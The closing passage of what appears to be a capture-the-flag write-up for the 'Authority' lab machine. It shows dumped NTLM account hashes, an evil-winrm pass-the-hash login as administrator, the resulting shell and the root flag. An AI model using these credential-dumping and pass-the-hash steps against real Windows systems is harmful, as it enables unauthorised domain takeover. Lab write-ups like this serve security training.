svc_ldap:1601:aad3b435b51404eeaad3b435b51404ee:6839f4ed6c7e142fed7988a6c5d0c5f1:::
letmein:12103:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
AUTHORITY$:1000:aad3b435b51404eeaad3b435b51404ee:d33147d2c0d25b716bba0e960fbf9f34:::
Letmein$:12104:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
[*] Cleaning up...
└─$ evil-winrm -i authority.htb -u administrator -H '6961f422924da90a6928197429eea4ed'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator

Root.txt

f078d946a0d4910dd745a90e0b555f6f

PreviousAppsanity NextBackend

Last updated 8 months ago

hashtagRecon

hashtagSMB

hashtagHTTPs (8443)

hashtagWinRM

hashtagUser.txt

hashtagPrivilege Escalation

hashtagPath 1

hashtagPath 2

hashtagRoot.txt